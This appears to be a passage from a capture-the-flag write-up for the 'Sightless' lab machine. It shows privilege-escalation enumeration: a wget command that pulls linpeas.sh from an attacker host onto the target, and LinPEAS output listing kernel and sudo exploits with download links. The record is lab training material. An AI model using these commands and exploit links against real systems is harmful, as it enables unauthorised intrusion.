PEAS


Conducting automated enumeration after performing basic system enumeration

michael@sightless:/var/tmp$ wget -q http://10.10.15.34/linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete

Executing PEAS

CVEs


╔══════════╣ Searching Signature verification failed in dmesg
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
 
╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Processes


A Chrome browser is running, initiated by the script /home/john/automation/administration.py, which is part of a cron job

Services


╔══════════╣ D-Bus Service Objects list
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                             PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                               1 systemd         root             :1.0          init.scope                  -       -
:1.1                             759 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -
:1.2                             590 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
:1.20                           1543 chrome          john             :1.20         cron.service                -       -
:1.21                           1543 chrome          john             :1.21         cron.service                -       -
:1.24                           9855 upowerd         root             :1.24         upower.service              -       -
:1.3                             758 systemd-resolve systemd-resolve  :1.3          systemd-resolved.service    -       -
:1.35                         111901 systemd         michael          :1.35         user@1000.service           -       -
:1.4                             850 polkitd         root             :1.4          polkit.service              -       -
:1.43                         120523 busctl          michael          :1.43         session-1697.scope          1697    -
:1.5                             853 udisksd         root             :1.5          udisks2.service             -       -
:1.6                             852 systemd-logind  root             :1.6          systemd-logind.service      -       -
:1.7                             884 ModemManager    root             :1.7          ModemManager.service        -       -
:1.9                             848 networkd-dispat root             :1.9          networkd-dispatcher.service -       -
com.ubuntu.SoftwareProperties      - -               -                (activatable) -                           -       -
org.freedesktop.DBus               1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1    884 ModemManager    root             :1.7          ModemManager.service        -       -
org.freedesktop.PackageKit         - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1       850 polkitd         root             :1.4          polkit.service              -       -
org.freedesktop.UDisks2          853 udisksd         root             :1.5          udisks2.service             -       -
org.freedesktop.UPower          9855 upowerd         root             :1.24         upower.service              -       -
org.freedesktop.bolt               - -               -                (activatable) -                           -       -
org.freedesktop.fwupd              - -               -                (activatable) -                           -       -
org.freedesktop.hostname1          - -               -                (activatable) -                           -       -
org.freedesktop.locale1            - -               -                (activatable) -                           -       -
org.freedesktop.login1           852 systemd-logind  root             :1.6          systemd-logind.service      -       -
org.freedesktop.network1         590 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
org.freedesktop.resolve1         758 systemd-resolve systemd-resolve  :1.3          systemd-resolved.service    -       -
org.freedesktop.systemd1           1 systemd         root             :1.0          init.scope                  -       -
org.freedesktop.thermald           - -               -                (activatable) -                           -       -
org.freedesktop.timedate1          - -               -                (activatable) -                           -       -
org.freedesktop.timesync1        759 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -

Network


Web


admin.sightless.htb

web1.sightless.htb